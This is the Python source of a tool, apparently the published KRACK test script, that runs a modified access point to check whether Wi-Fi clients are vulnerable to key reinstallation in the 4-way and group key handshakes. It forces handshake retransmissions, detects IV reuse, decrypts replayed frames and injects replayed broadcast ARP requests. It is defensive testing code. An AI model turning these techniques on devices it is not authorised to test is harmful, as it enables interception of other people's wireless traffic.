krack-test-client.py 25 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609610611612613614615616617618619620621622623624625626627628629630631632633634635636637638639640641642643644645646647648649650651652653654655656657658659660661
  1. #!/usr/bin/env python2
  2. import logging
  3. logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
  4. from scapy.all import *
  5. import sys, socket, struct, time, subprocess, atexit, select
  6. from datetime import datetime
  7. from wpaspy import Ctrl
  8. from Cryptodome.Cipher import AES
  9. USAGE = """{name} - Tool to test Key Reinstallation Attacks against clients
  10. To test wheter a client is vulnerable to Key Reinstallation Attack against
  11. the 4-way handshake or group key handshake, take the following steps:
  12. 1. Compile our modified hostapd instance. This only needs to be done once.
  13. cd ../hostapd
  14. cp defconfig .config
  15. make -j 2
  16. 2. The hardware encryption engine of some Wi-Fi NICs have bugs that interfere
  17. with our script. So disable hardware encryption by executing:
  18. cd ../krackattack/
  19. ./disable-hwcrypto.sh
  20. This only needs to be done once. It's recommended to reboot after executing
  21. this script. After plugging in your Wi-Fi NIC, use `systool -vm ath9k_htc`
  22. or similar to confirm the nohwcript/.. param has been set. We tested this
  23. script with an Intel Dual Band Wireless-AC 7260 and a TP-Link TL-WN722N.
  24. 3. Execute this script. Accepted parameters are:
  25. --group Test the group key handshake instead of the 4-way handshake
  26. --debug Show more debug messages
  27. All other supplied arguments are passed on to hostapd.
  28. The only two commands you will normally have to execute are:
  29. {name}
  30. {name} --group
  31. The first one tests for key reinstallations in the 4-way handshake (see
  32. step 4), and the second tests one for key reinstallations in the group key
  33. handshake (see step 5).
  34. !! The default network name is testnetwork with password abcdefgh !!
  35. Note that you can change settings of the AP by modifying hostapd.conf.
  36. You will probably have to edit the line `interface=` to specify a Wi-Fi
  37. interface to use for the AP.
  38. 4. To test key reinstallations in the 4-way handshake, the script will keep
  39. sending encrypted message 3's to the client. To start the script execute:
  40. {name}
  41. Connect the the AP and the following tests will be performed automatically:
  42. 4a. The script monitors traffic sent by the client to see if the pairwise
  43. key is being reinstalled. To assure the client is sending enough frames,
  44. you can optionally ping the AP: ping 192.168.100.254 .
  45. If the client is vulnerable, the script will show something like:
  46. [19:02:37] 78:31:c1:c4:88:92: IV reuse detected (IV=1, seq=10). Client is vulnerable to pairwise key reinstallations in the 4-way handshake!
  47. If the client is patched, the script will show (this can take a minute):
  48. [18:58:11] 90:18:7c:6e:6b:20: client DOESN'T seem vulnerable to pairwise key reinstallation in the 4-way handshake.
  49. 4b. Once the client has requested an IP using DHCP, the script tests for
  50. reinstallations of the group key by sending broadcast ARP requests to the
  51. client using an already used (replayed) packet number (= IV). The client
  52. *must* request an IP using DHCP for this test to start.
  53. If the client is vulnerable, the script will show something like:
  54. [19:03:08] 78:31:c1:c4:88:92: Received 5 unique replies to replayed broadcast ARP requests. Client is vulnerable to group
  55. [19:03:08] key reinstallations in the 4-way handshake (or client accepts replayed broadcast frames)!
  56. If the client is patched, the script will show (this can take a minute):
  57. [19:03:08] 78:31:c1:c4:88:92: client DOESN'T seem vulnerable to group key reinstallation in the 4-way handshake handshake.
  58. Note that this scripts *indirectly* tests for reinstallations of the group
  59. key, by testing if replayed broadcast frames are accepted by the client.
  60. 5. To test key reinstallations in the group key handshake, the script will keep
  61. performing new group key handshakes using an identical (static) group key.
  62. The client *must* request an IP using DHCP for this test to start. To start
  63. the script execute:
  64. {name} --group
  65. Connect the the AP and all tests will be performed automatically. The
  66. working and output of the script is now similar as in step 4b.
  67. 6. Some final recommendations:
  68. 6a. Perform these tests in a room with little interference. A high amount
  69. of packet loss will make this script unreliable!
  70. 6b. Manually inspect network traffic to confirm the output of the script:
  71. - Use an extra Wi-Fi NIC in monitor mode to check pairwise key reinstalls
  72. by monitoring the IVs of frames sent by the client.
  73. - Capture traffic on the client to see if the replayed broadcast ARP
  74. requests are accepted or not.
  75. 6c. If the client can use multiple Wi-Fi radios/NICs, test using a few
  76. different ones.
  77. """
  78. # Future work:
  79. # - Detect if the client reinstalls an all-zero encryption key (wpa_supplicant v2.4 and 2.5)
  80. # - Ability to test the group key handshake against specific clients only
  81. # - Individual test to see if the client accepts replayed broadcast traffic (without performing key reinstallation)
  82. # After how many seconds a new message 3, or new group key message 1, is sent.
  83. # This value must match the one in `../src/ap/wpa_auth.c` (same variable name).
  84. HANDSHAKE_TRANSMIT_INTERVAL = 2
  85. #### Basic output and logging functionality ####
  86. ALL, DEBUG, INFO, STATUS, WARNING, ERROR = range(6)
  87. COLORCODES = { "gray" : "\033[0;37m",
  88. "green" : "\033[0;32m",
  89. "orange": "\033[0;33m",
  90. "red" : "\033[0;31m" }
  91. global_log_level = INFO
  92. def log(level, msg, color=None, showtime=True):
  93. if level < global_log_level: return
  94. if level == DEBUG and color is None: color="gray"
  95. if level == WARNING and color is None: color="orange"
  96. if level == ERROR and color is None: color="red"
  97. print (datetime.now().strftime('[%H:%M:%S] ') if showtime else " "*11) + COLORCODES.get(color, "") + msg + "\033[1;0m"
  98. #### Packet Processing Functions ####
  99. class DHCP_sock(DHCP_am):
  100. def __init__(self, **kwargs):
  101. self.sock = kwargs.pop("sock")
  102. super(DHCP_am, self).__init__(**kwargs)
  103. def send_reply(self, reply):
  104. self.sock.send(reply, **self.optsend)
  105. def print_reply(self, req, reply):
  106. log(STATUS, "%s: DHCP reply %s to %s" % (reply.getlayer(Ether).dst, reply.getlayer(IP).dst, reply.dst), color="green")
  107. def remove_client(self, clientmac):
  108. clientip = self.leases[clientmac]
  109. self.pool.append(clientip)
  110. del self.leases[clientmac]
  111. class ARP_sock(ARP_am):
  112. def __init__(self, **kwargs):
  113. self.sock = kwargs.pop("sock")
  114. super(ARP_am, self).__init__(**kwargs)
  115. def send_reply(self, reply):
  116. self.sock.send(reply, **self.optsend)
  117. def print_reply(self, req, reply):
  118. log(STATUS, "%s: ARP: %s ==> %s on %s" % (reply.getlayer(Ether).dst, req.summary(), reply.summary(), self.iff))
  119. class MitmSocket(L2Socket):
  120. def __init__(self, **kwargs):
  121. super(MitmSocket, self).__init__(**kwargs)
  122. def send(self, p):
  123. # Hack: set the More Data flag so we can detect injected frames (and so clients stay awake longer)
  124. p[Dot11].FCfield |= 0x20
  125. L2Socket.send(self, RadioTap()/p)
  126. def _strip_fcs(self, p):
  127. # Scapy can't handle the optional Frame Check Sequence (FCS) field automatically
  128. if p[RadioTap].present & 2 != 0:
  129. rawframe = str(p[RadioTap])
  130. pos = 8
  131. while ord(rawframe[pos - 1]) & 0x80 != 0: pos += 4
  132. # If the TSFT field is present, it must be 8-bytes aligned
  133. if p[RadioTap].present & 1 != 0:
  134. pos += (8 - (pos % 8))
  135. pos += 8
  136. # Remove FCS if present
  137. if ord(rawframe[pos]) & 0x10 != 0:
  138. return Dot11(str(p[Dot11])[:-4])
  139. return p[Dot11]
  140. def recv(self, x=MTU):
  141. p = L2Socket.recv(self, x)
  142. if p == None or not Dot11 in p: return None
  143. # Hack: ignore frames that we just injected and are echoed back by the kernel
  144. if p[Dot11].FCfield & 0x20 != 0:
  145. return None
  146. # Strip the FCS if present, and drop the RadioTap header
  147. return self._strip_fcs(p)
  148. def close(self):
  149. super(MitmSocket, self).close()
  150. def dot11_get_seqnum(p):
  151. return p[Dot11].SC >> 4
  152. def dot11_get_iv(p):
  153. """Scapy can't handle Extended IVs, so do this properly ourselves (only works for CCMP)"""
  154. wep = p[Dot11WEP]
  155. if wep.keyid & 32:
  156. # FIXME: Only CCMP is supported (TKIP uses a different IV structure)
  157. return ord(wep.iv[0]) + (ord(wep.iv[1]) << 8) + (struct.unpack(">I", wep.wepdata[0:4])[0] << 16)
  158. else:
  159. return ord(wep.iv[0]) + (ord(wep.iv[1]) << 8) + (ord(wep.iv[2]) << 16)
  160. def dot11_get_priority(p):
  161. if not Dot11QoS in p: return 0
  162. return ord(str(p[Dot11QoS])[0])
  163. #### Main Testing Code ####
  164. class IvInfo():
  165. def __init__(self, p):
  166. self.iv = dot11_get_iv(p)
  167. self.seq = dot11_get_seqnum(p)
  168. self.time = p.time
  169. def is_reused(self, p):
  170. """Check if frame p reuses an IV and is not a retransmitted frame"""
  171. iv = dot11_get_iv(p)
  172. seq = dot11_get_seqnum(p)
  173. return self.iv == iv and self.seq != seq and p.time >= self.time + 1
  174. class ClientState():
  175. UNKNOWN, VULNERABLE, PATCHED = range(3)
  176. IDLE, STARTED, GOT_CANARY, FINISHED = range(4)
  177. def __init__(self, clientmac, test_group_hs=False):
  178. self.mac = clientmac
  179. self.TK = None
  180. self.vuln_4way = ClientState.UNKNOWN
  181. self.vuln_group = ClientState.UNKNOWN
  182. # FIXME: Separate variable for group handshake result?
  183. self.ivs = dict() # maps IV values to IvInfo objects
  184. self.pairkey_sent_time_prev_iv = None
  185. self.pairkey_intervals_no_iv_reuse = 0
  186. self.groupkey_reset()
  187. self.groupkey_grouphs = test_group_hs
  188. def groupkey_reset(self):
  189. self.groupkey_state = ClientState.IDLE
  190. self.groupkey_prev_canary_time = 0
  191. self.groupkey_num_canaries = 0
  192. self.groupkey_requests_sent = 0
  193. self.groupkey_patched_intervals = -1 # -1 because the first broadcast ARP requests are still valid
  194. def start_grouphs_test():
  195. self.groupkey_reset()
  196. self.groupkey_grouphs = True
  197. def get_encryption_key(self, hostapd_ctrl):
  198. if self.TK is None:
  199. # Clear old replies and messages from the hostapd control interface
  200. while hostapd_ctrl.pending():
  201. hostapd_ctrl.recv()
  202. # Contact our modified Hostapd instance to request the pairwise key
  203. response = hostapd_ctrl.request("GET_TK " + self.mac)
  204. if not "FAIL" in response:
  205. self.TK = response.strip().decode("hex")
  206. return self.TK
  207. def decrypt(self, p, hostapd_ctrl):
  208. # Extract encrypted payload:
  209. # - Skip extended IV (4 bytes in total)
  210. # - Exclude first 4 bytes of the CCMP MIC (note that last 4 are saved in the WEP ICV field)
  211. payload = str(p.wepdata[4:-4])
  212. llcsnap, packet = payload[:8], payload[8:]
  213. if payload.startswith("\xAA\xAA\x03\x00\x00\x00"):
  214. # On some kernels, the virtual interface associated to the real AP interface will return
  215. # frames where the payload is already decrypted. So if the payload seems decrypted, just
  216. # extract the full plaintext from the frame.
  217. plaintext = payload
  218. else:
  219. client = self.mac
  220. key = self.get_encryption_key(hostapd_ctrl)
  221. priority = dot11_get_priority(p)
  222. iv = dot11_get_iv(p)
  223. pn = struct.pack(">I", iv >> 16) + struct.pack(">H", iv & 0xFFFF)
  224. nonce = chr(priority) + self.mac.replace(':','').decode("hex") + pn
  225. cipher = AES.new(key, AES.MODE_CCM, nonce, mac_len=8)
  226. plaintext = cipher.decrypt(payload)
  227. return plaintext
  228. def track_used_iv(self, p):
  229. iv = dot11_get_iv(p)
  230. self.ivs[iv] = IvInfo(p)
  231. def is_iv_reused(self, p):
  232. """Returns True if this is an *observed* IV reuse and not just a retransmission"""
  233. iv = dot11_get_iv(p)
  234. return iv in self.ivs and self.ivs[iv].is_reused(p)
  235. def is_new_iv(self, p):
  236. """Returns True if the IV in this frame is higher than all previously observed ones"""
  237. iv = dot11_get_iv(p)
  238. if len(self.ivs) == 0: return True
  239. return iv > max(self.ivs.keys())
  240. def check_pairwise_reinstall(self, p):
  241. """Inspect whether the IV is reused, or whether the client seem to be patched"""
  242. # If this is gaurenteed IV reuse (and not just a benign retransmission), mark the client as vulnerable
  243. if self.is_iv_reused(p):
  244. if self.vuln_4way != ClientState.VULNERABLE:
  245. iv = dot11_get_iv(p)
  246. seq = dot11_get_seqnum(p)
  247. log(INFO, ("%s: IV reuse detected (IV=%d, seq=%d). " +
  248. "Client is vulnerable to pairwise key reinstallations in the 4-way handshake!") % (self.mac, iv, seq), color="green")
  249. self.vuln_4way = ClientState.VULNERABLE
  250. # If it's a higher IV than all previous ones, try to check if the client seems patched
  251. elif self.vuln_4way == ClientState.UNKNOWN and self.is_new_iv(p):
  252. # Save how many intervals we received a data packet without IV reset. Use twice the
  253. # transmission interval of message 3, in case one message 3 is lost due to noise.
  254. if self.pairkey_sent_time_prev_iv is None:
  255. self.pairkey_sent_time_prev_iv = p.time
  256. elif self.pairkey_sent_time_prev_iv + 2 * HANDSHAKE_TRANSMIT_INTERVAL + 1 <= p.time:
  257. self.pairkey_intervals_no_iv_reuse += 1
  258. self.pairkey_sent_time_prev_iv = p.time
  259. log(DEBUG, "%s: no pairwise IV resets seem to have occured for one interval" % self.mac)
  260. # If during several intervals all IV reset attempts failed, the client is likely patched.
  261. # We wait for enough such intervals to occur, to avoid getting a wrong result.
  262. if self.pairkey_intervals_no_iv_reuse >= 5 and self.vuln_4way == ClientState.UNKNOWN:
  263. self.vuln_4way = ClientState.PATCHED
  264. log(INFO, "%s: client DOESN'T seem vulnerable to pairwise key reinstallation in the 4-way handshake." % self.mac, color="green")
  265. def groupkey_handle_canary(self, p):
  266. """Handle replies to the replayed ARP broadcast request (which reuses an IV)"""
  267. # Must be testing this client, and must not be a benign retransmission
  268. if not self.groupkey_state in [ClientState.STARTED, ClientState.GOT_CANARY]: return
  269. if self.groupkey_prev_canary_time + 1 > p.time: return
  270. self.groupkey_num_canaries += 1
  271. log(DEBUG, "%s: received %d replies to the replayed broadcast ARP requests\n" % (self.mac, self.groupkey_num_canaries))
  272. # We wait for several replies before marking the client as vulnerable, because
  273. # the first few broadcast ARP requests still use a valid (not yet used) IV.
  274. if self.groupkey_num_canaries >= 5:
  275. assert self.vuln_group != ClientState.VULNERABLE
  276. log(INFO, "%s: Received %d unique replies to replayed broadcast ARP requests. Client is vulnerable to group" \
  277. % (self.mac, self.groupkey_num_canaries), color="green")
  278. log(INFO, " key reinstallations in the %s handshake (or client accepts replayed broadcast frames)!" \
  279. % ("group key" if self.groupkey_grouphs else "4-way"), color="green")
  280. self.vuln_group = ClientState.VULNERABLE
  281. self.groupkey_state = ClientState.FINISHED
  282. # Remember that we got a reply this interval (see groupkey_track_request to detect patched clients)
  283. else:
  284. self.groupkey_state = ClientState.GOT_CANARY
  285. self.groupkey_prev_canary_time = p.time
  286. def groupkey_track_request(self):
  287. """Track when we went broadcast ARP requests, and determine if a client seems patched"""
  288. if self.vuln_group != ClientState.UNKNOWN: return
  289. hstype = "group key" if self.groupkey_grouphs else "4-way"
  290. # Show a message when we started with testing the client
  291. if self.groupkey_state == ClientState.IDLE:
  292. log(STATUS, "%s: client has IP address -> testing for group key reinstallation in the %s handshake" % (self.mac, hstype))
  293. self.groupkey_state = ClientState.STARTED
  294. if self.groupkey_requests_sent == 3:
  295. # We sent three broadcast ARP requests, and at least one got a reply. Indication that client is vulnerable.
  296. if self.groupkey_state == ClientState.GOT_CANARY:
  297. log(DEBUG, "%s: got a reply to broadcast ARP during this interval" % self.mac)
  298. self.groupkey_state = ClientState.STARTED
  299. # We sent three broadcast ARP requests, and didn't get a reply to any. Indication that client is patched.
  300. elif self.groupkey_state == ClientState.STARTED:
  301. self.groupkey_patched_intervals += 1
  302. log(DEBUG, "%s: no group IV resets seem to have occured for %d interval(s)" % (self.mac, self.groupkey_patched_intervals))
  303. self.groupkey_state = ClientState.STARTED
  304. self.groupkey_requests_sent = 0
  305. # If the client appears secure for several intervals (see above), it's likely patched
  306. if self.groupkey_patched_intervals >= 5 and self.vuln_group == ClientState.UNKNOWN:
  307. log(INFO, "%s: client DOESN'T seem vulnerable to group key reinstallation in the %s handshake." % (self.mac, hstype), color="green")
  308. self.vuln_group = ClientState.PATCHED
  309. self.groupkey_state = ClientState.FINISHED
  310. self.groupkey_requests_sent += 1
  311. log(DEBUG, "%s: sent %d broadcasts ARPs this interval" % (self.mac, self.groupkey_requests_sent))
  312. class KRAckAttackClient():
  313. def __init__(self, interface):
  314. self.nic_iface = interface
  315. self.nic_mon = interface + "mon"
  316. self.test_grouphs = False
  317. try:
  318. self.apmac = scapy.arch.get_if_hwaddr(interface)
  319. except:
  320. log(ERROR, "Failed to get MAC address of %s. Does this interface exist?" % interface)
  321. raise
  322. self.sock_mon = None
  323. self.sock_eth = None
  324. self.hostapd = None
  325. self.hostapd_ctrl = None
  326. self.dhcp = None
  327. self.group_ip = None
  328. self.group_arp = None
  329. self.clients = dict()
  330. def reset_client_info(self, clientmac):
  331. if clientmac in self.dhcp.leases:
  332. self.dhcp.remove_client(clientmac)
  333. log(DEBUG, "%s: Removing client from DHCP leases" % clientmac)
  334. if clientmac in self.clients:
  335. del self.clients[clientmac]
  336. log(DEBUG, "%s: Removing ClientState object" % clientmac)
  337. def handle_replay(self, p):
  338. """Replayed frames (caused by a pairwise key reinstallation) are rejected by the kernel. This
  339. function processes these frames manually so we can still test reinstallations of the group key."""
  340. if not Dot11WEP in p: return
  341. # Reconstruct Ethernet header
  342. clientmac = p.addr2
  343. header = Ether(dst=self.apmac, src=clientmac)
  344. header.time = p.time
  345. # Decrypt the payload and obtain LLC/SNAP header and packet content
  346. client = self.clients[clientmac]
  347. plaintext = client.decrypt(p, self.hostapd_ctrl)
  348. llcsnap, packet = plaintext[:8], plaintext[8:]
  349. # Rebuild the full Ethernet packet
  350. if llcsnap == "\xAA\xAA\x03\x00\x00\x00\x08\x06":
  351. decap = header/ARP(packet)
  352. elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x08\x00":
  353. decap = header/IP(packet)
  354. elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x86\xdd":
  355. decap = header/IPv6(packet)
  356. #elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x88\x8e":
  357. # # EAPOL
  358. else:
  359. return
  360. # Now process the packet as if it were a valid (non-replayed) one
  361. self.process_eth_rx(decap)
  362. def handle_mon_rx(self):
  363. p = self.sock_mon.recv()
  364. if p == None: return
  365. if p.type == 1: return
  366. # Note: we cannot verify that the NIC is indeed reusing IVs when sending the broadcast
  367. # ARP requests, because it may override them in the firmware/hardware (some Atheros
  368. # Wi-Fi NICs do no properly reset the Tx group key IV when using hardware encryption).
  369. # The first bit in FCfield is set if the frames is "to-DS"
  370. clientmac, apmac = (p.addr1, p.addr2) if (p.FCfield & 2) != 0 else (p.addr2, p.addr1)
  371. if apmac != self.apmac: return None
  372. # Reset info about disconnected clients
  373. if Dot11Deauth in p or Dot11Disas in p:
  374. self.reset_client_info(clientmac)
  375. # Inspect encrypt frames for IV reuse & handle replayed frames rejected by the kernel
  376. elif p.addr1 == self.apmac and Dot11WEP in p:
  377. if not clientmac in self.clients:
  378. self.clients[clientmac] = ClientState(clientmac, test_group_hs=self.test_grouphs)
  379. client = self.clients[clientmac]
  380. iv = dot11_get_iv(p)
  381. log(DEBUG, "%s: transmitted data using IV=%d (seq=%d)" % (clientmac, iv, dot11_get_seqnum(p)))
  382. if not self.test_grouphs:
  383. client.check_pairwise_reinstall(p)
  384. if client.is_iv_reused(p):
  385. self.handle_replay(p)
  386. client.track_used_iv(p)
  387. def process_eth_rx(self, p):
  388. self.dhcp.reply(p)
  389. self.group_arp.reply(p)
  390. clientmac = p[Ether].src
  391. if not clientmac in self.clients: return
  392. client = self.clients[clientmac]
  393. if ARP in p and p[ARP].pdst == self.group_ip:
  394. client.groupkey_handle_canary(p)
  395. def handle_eth_rx(self):
  396. p = self.sock_eth.recv()
  397. if p == None or not Ether in p: return
  398. self.process_eth_rx(p)
  399. def configure_interfaces(self):
  400. log(STATUS, "Note: disable Wi-Fi in network manager & disable hardware encryption. Both may interfere with this script.")
  401. # 0. Some users may forget this otherwise
  402. subprocess.check_output(["rfkill", "unblock", "wifi"])
  403. # 1. Remove unused virtual interfaces to start from a clean state
  404. subprocess.call(["iw", self.nic_mon, "del"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
  405. # 2. Configure monitor mode on interfaces
  406. subprocess.check_output(["iw", self.nic_iface, "interface", "add", self.nic_mon, "type", "monitor"])
  407. # Some kernels (Debian jessie - 3.16.0-4-amd64) don't properly add the monitor interface. The following ugly
  408. # sequence of commands assures the virtual interface is properly registered as a 802.11 monitor interface.
  409. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  410. time.sleep(0.5)
  411. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  412. subprocess.check_output(["ifconfig", self.nic_mon, "up"])
  413. def run(self, test_grouphs=False):
  414. self.configure_interfaces()
  415. # Open the patched hostapd instance that carries out tests and let it start
  416. log(STATUS, "Starting hostapd ...")
  417. self.hostapd = subprocess.Popen(["../hostapd/hostapd", "hostapd.conf"] + sys.argv[1:])
  418. time.sleep(1)
  419. try:
  420. self.hostapd_ctrl = Ctrl("hostapd_ctrl/" + self.nic_iface)
  421. self.hostapd_ctrl.attach()
  422. except:
  423. log(ERROR, "It seems hostapd did not start properly, please inspect its output.")
  424. log(ERROR, "Did you disable Wi-Fi in the network manager? Otherwise hostapd won't work.")
  425. raise
  426. self.sock_mon = MitmSocket(type=ETH_P_ALL, iface=self.nic_mon)
  427. self.sock_eth = L2Socket(type=ETH_P_ALL, iface=self.nic_iface)
  428. # Let scapy handle DHCP requests
  429. self.dhcp = DHCP_sock(sock=self.sock_eth,
  430. domain='krackattack.com',
  431. pool=Net('192.168.100.0/24'),
  432. network='192.168.100.0/24',
  433. gw='192.168.100.254',
  434. renewal_time=600, lease_time=3600)
  435. # Configure gateway IP: reply to ARP and ping requests
  436. subprocess.check_output(["ifconfig", self.nic_iface, "192.168.100.254"])
  437. # Use a dedicated IP address for our broadcast ARP requests and replies
  438. self.group_ip = self.dhcp.pool.pop()
  439. self.group_arp = ARP_sock(sock=self.sock_eth, IP_addr=self.group_ip, ARP_addr=self.apmac)
  440. # If applicable, inform hostapd that we are testing the group key handshake
  441. if test_grouphs:
  442. self.hostapd_ctrl.request("START_GROUP_TESTS")
  443. self.test_grouphs = True
  444. log(STATUS, "Ready. Connect to this Access Point to start the tests. Make sure the client requests an IP using DHCP!", color="green")
  445. # Monitor both the normal interface and virtual monitor interface of the AP
  446. self.next_arp = time.time() + 1
  447. while True:
  448. sel = select.select([self.sock_mon, self.sock_eth], [], [], 1)
  449. if self.sock_mon in sel[0]: self.handle_mon_rx()
  450. if self.sock_eth in sel[0]: self.handle_eth_rx()
  451. # Periodically send the replayed broadcast ARP requests to test for group key reinstallations
  452. if time.time() > self.next_arp:
  453. self.next_arp = time.time() + HANDSHAKE_TRANSMIT_INTERVAL
  454. for client in self.clients.values():
  455. # Also keep injecting to PATCHED clients (just to be sure they keep rejecting replayed frames)
  456. if client.vuln_group != ClientState.VULNERABLE and client.mac in self.dhcp.leases:
  457. clientip = self.dhcp.leases[client.mac]
  458. client.groupkey_track_request()
  459. log(INFO, "%s: sending broadcast ARP to %s from %s" % (client.mac, clientip, self.group_ip))
  460. request = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, hwsrc=self.apmac, psrc=self.group_ip, pdst=clientip)
  461. self.sock_eth.send(request)
  462. def stop(self):
  463. log(STATUS, "Closing hostapd and cleaning up ...")
  464. if self.hostapd:
  465. self.hostapd.terminate()
  466. self.hostapd.wait()
  467. if self.sock_mon: self.sock_mon.close()
  468. if self.sock_eth: self.sock_eth.close()
  469. def cleanup():
  470. attack.stop()
  471. def argv_get_interface():
  472. for i in range(len(sys.argv)):
  473. if not sys.argv[i].startswith("-i"):
  474. continue
  475. if len(sys.argv[i]) > 2:
  476. return sys.argv[i][2:]
  477. else:
  478. return sys.argv[i + 1]
  479. return None
  480. def argv_pop_argument(argument):
  481. if not argument in sys.argv: return False
  482. idx = sys.argv.index(argument)
  483. del sys.argv[idx]
  484. return True
  485. def hostapd_read_config(config):
  486. # Read the config, get the interface name, and verify some settings.
  487. interface = None
  488. with open(config) as fp:
  489. for line in fp.readlines():
  490. line = line.strip()
  491. if line.startswith("interface="):
  492. interface = line.split('=')[1]
  493. elif line.startswith("wpa_pairwise=") or line.startswith("rsn_pairwise"):
  494. if "TKIP" in line:
  495. log(ERROR, "ERROR: This scripts only support tests using CCMP. Only include CCMP in the following config line:")
  496. log(ERROR, " >%s<" % line, showtime=False)
  497. quit(1)
  498. # Parameter -i overrides interface in config.
  499. # FIXME: Display warning when multiple interfaces are used.
  500. if argv_get_interface() is not None:
  501. interface = argv_get_interface()
  502. return interface
  503. if __name__ == "__main__":
  504. if "--help" in sys.argv or "-h" in sys.argv:
  505. print USAGE.format(name=sys.argv[0])
  506. quit(1)
  507. test_grouphs = argv_pop_argument("--group")
  508. while argv_pop_argument("--debug"):
  509. global_log_level -= 1
  510. try:
  511. interface = hostapd_read_config("hostapd.conf")
  512. except Exception as ex:
  513. log(ERROR, "Failed to parse the hostapd.conf config file")
  514. raise
  515. if not interface:
  516. log(ERROR, "Failed to determine wireless interface. Specify one in the hostapd config file.")
  517. quit(1)
  518. attack = KRAckAttackClient(interface)
  519. atexit.register(cleanup)
  520. attack.run(test_grouphs=test_grouphs)